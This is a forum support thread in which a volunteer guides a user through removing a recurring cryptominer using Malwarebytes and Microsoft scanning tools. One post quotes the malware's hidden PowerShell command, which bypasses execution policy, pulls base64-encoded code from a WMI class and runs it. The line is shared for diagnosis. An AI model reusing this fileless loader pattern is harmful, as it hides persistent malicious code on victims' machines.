Jump to content

CryptoMiner keeps installing/running after malwarebytes removes it.


Derrick7
 Share

Recommended Posts

I am needing some assistance on completely removing this cryptominer malware that seems to re-deploy itself the next day.  I find that there is a powershell script that starts running which sends traffic over port 14444. I kill the powershell.exe and run malwarebytes to remove it, but it comes back the following day.

Help!

Link to post
Share on other sites

Hi @Derrick7       :welcome:

would appreciate  getting  additional / fuller  important details from this machine in order to help you forward.
 NOTE: The tools and the information obtained is safe and not harmful to your privacy or your computer, please allow the programs to run if blocked by your system.

I need to see all the Malwarebytes for Windows logs & its configuration, as well as other info about what is running on this Windows computer.

Do have patience while the report tool runs.  It may take several minutes.  Just let it run & take its time.  You may want to close your other open windows so that there is a clear field of view.
Download Malwarebytes Support Tool
    
    Once the file is downloaded, open your Downloads folder/location of the downloaded file
    Double-click mb-support-1.80.848.exe  to run the report

Once it starts, you will see a first screen with 2 buttons.  Click the one on the left marked "I don't have an open support ticket".

        You may be prompted by User Account Control (UAC) to allow changes to be made to your computer. Click Yes to consent.
        
    Place a checkmark next to Accept License Agreement and click Next
Now click the left-hand side pane "I do not have an open support ticket"

    You will be presented with a page stating, "Get Started!"
    Do NOT use the button “Start repair” !   But look instead at the far-left options list in black.

    Click the Advanced tab on the left column
    
    Click the Gather Logs button
    
    A progress bar will appear and the program will proceed with getting logs from your computer.  Please do have patience.  It takes several minutes to gather.
   
    Upon completion, click a file named mbst-grab-results.zip will be saved to your Desktop. Click OK.  Then Exit the tool.

    Please attach the ZIP file in your next reply.

Please know I help here as a volunteer.  and that I am not on 24 x 7.
Help on this forum is one to one. 

Sincerely,

Maurice

Edited by Maurice Naggar
Link to post
Share on other sites

Thank you for the support-tool report.  I fail to find that Malwarebytes for Windows is presently installed on this computer.   I'll have you do that later.

For now, this

Please read all of these lines first so that it is all clear to you about our plan. I need a one time run of MBAR like listed here, please.

 

Please download Malwarebytes Anti-Rootkit (MBAR) from this link here

 

and save it to your desktop.

RIGHT click on the MBAR file and select "Run As Administrator"  & reply YES   &  allow it to run.

 

•Click OK on the next screen, to allow the package to extract the contents of the file to its own folder named mbar.

 

•mbar.exe will launch automatically. On some systems, this may take a few extra seconds. Please be patient and wait for the program to open.

 

•After reading the Introduction, click 'Next' if you agree.

 

•On the Update Database screen, click on the 'Update' button.

 

•Once you see 'Success: Database was successfully updated' click on 'Next', then click the Scan button.

 

With some infections, you may see two messages boxes:

 

1.'Could not load protection driver'. Click 'OK'.

2.'Could not load DDA driver'. Click 'Yes' to this message, to allow the driver to load after a restart. Allow the computer to restart. Continue with the rest of these instructions.

 

•If malware is found, press the Cleanup button when the scan completes. .

 

Please attach the log it produces, you'll find the log in that mbar folder as MBAR-log-<date and time>***.txt . Please attach that to your next reply.

 

Link to post
Share on other sites

This is the powershell script that is running when I use process explorer.

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden -exec bypass "$mon = ([WmiClass] 'root\default:systemcore_Updater8').Properties['mon'].Value;$funs = ([WmiClass] 'root\default:systemcore_Updater8').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)));Invoke-Command  -ScriptBlock $RemoteScriptBlock -ArgumentList @($mon, $mon, 'Void', 0, '', '')"

Link to post
Share on other sites

The MBAR log you sent showed no rootkits detected.  That is a good thing.

I would caution that trying to help on 2 or more machines is tricky since it is easy to lose track of which one is which.

Lets try to focus on the first machine  and get that one all cured .....before we do stuff on the other.

.

I believe the first machine is tagged / labeled as ACI-DOLIVERS0     which appears to be a MS Surface Book.

This has the latest Windows 10 build 20H2  which has the EDGE browser  ( that one based on Chromium-project-code) as well as Google Chrome version 87.

They each one can take the same Malwarebytes Browser Guard as browser extensions, to better help guard them.

[   1   ]

I suggest you install the Malwarebytes Browser guard for Chrome.

To get & install the Malwarebytes Browser Guard extension for Chrome,

 

Open this link in your Chrome   browser: 

https://chrome.google.com/webstore/detail/malwarebytes/ihcjicgdanjaechkgeegckofjjedodee

 

Then proceed with the setup.

.

[     2     ]

Now the EDGE browser.

Open this link in your EDGE   browser: 

https://chrome.google.com/webstore/detail/malwarebytes/ihcjicgdanjaechkgeegckofjjedodee

 

Then proceed with the setup.

[   3    ]

See this article on our Malwarebytes Blog
https://blog.malwarebytes.com/security-world/technology/2019/01/browser-push-notifications-feature-asking-abused/

 

You want to disable the ability of each web browser on this machine from being able to allow "push ads". That means Chrome, Firefox, or Edge browser (on Windows 10), or on Opera.

Scroll down to the tips section "How do I disable them".

[   4   ]

Let me suggest one  scan with a Microsoft tool.    

The Microsoft Safety Scanner  is a free Microsoft stand-alone virus scanner that  can be used to scan for & remove malware or potentially unwanted software from a system.

The download links & the how-to-run-the tool are at this link at Microsoft

https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/safety-scanner-download

I suggest selecting a   FULL  scan.

Let me know the result of this.

The log is named MSERT.log 

the log will be at  %SYSTEMROOT%\debug\msert.log   which in most cases is

C:\Windows\debug\msert.log

Please attach that log with your reply. 

[   5  ]

I notice this machine does not have installed the Malwarebytes for Windows program.   You can get and run it at no cost.

Get, save, and do the setup  https://support.malwarebytes.com/hc/en-us/articles/360038479134-Download-and-install-Malwarebytes-for-Windows

Next.

Start Malwarebytes for Windows. Click Settings ( gear ) icon. Next, lets make real sure that Malwarebytes does NOT register with Windows Security Center 

Click the Security Tab. Scroll down to 

"Windows Security Center"

Click the selection to the left  for the line "Always register Malwarebytes in the Windows Security Cent

NEXT:

Still on  the SECURITY  tab.
Scroll  and lets be sure the line in SCAN OPTIONs for "Scan for rootkits" is ON
Click it to get it ON  if it does not show a blue-color

Now click the small X  to get back to the main menu window.


Click the SCAN button.
Select a Threat Scan ( which should be the default).

When the scan phase is done, be real sure you Review and have all detected lines items check-marked on each line on the left. That too is very critical.

Then click on Quarantine selected.

 

Be sure all items were removed.

 

 

Then, locate the Scan run report;  export out a copy;  & then attach in with your  reply.

See https://support.malwarebytes.com/hc/en-us/articles/360038479194-View-Reports-and-History-in-Malwarebytes-for-Windows-v4

We weill do more afterward.    Thanks.

Link to post
Share on other sites

PS.  If you are logged in or part of a business or organization domain, please be sure you let me know.  Likewise, if you are in that type network, have you checked with your IT Support Helpdesk ?

If you are a regular home user, I would like to know that too.

And, if these are business computers and you work from home, also let me know.  I am trying to pin down whether or not there is a legitimate reason for scripts to be running on your machines.

Link to post
Share on other sites

  • 3 weeks later...

Due to the lack of feedback, this topic is closed to prevent others from posting here.

If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this topic with your request.

This applies only to the originator of this topic. Other members who need assistance please start your own topic in a new thread.

Tips to help protect from infection

Thanks

 

Link to post
Share on other sites

Guest
This topic is now closed to further replies.
 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.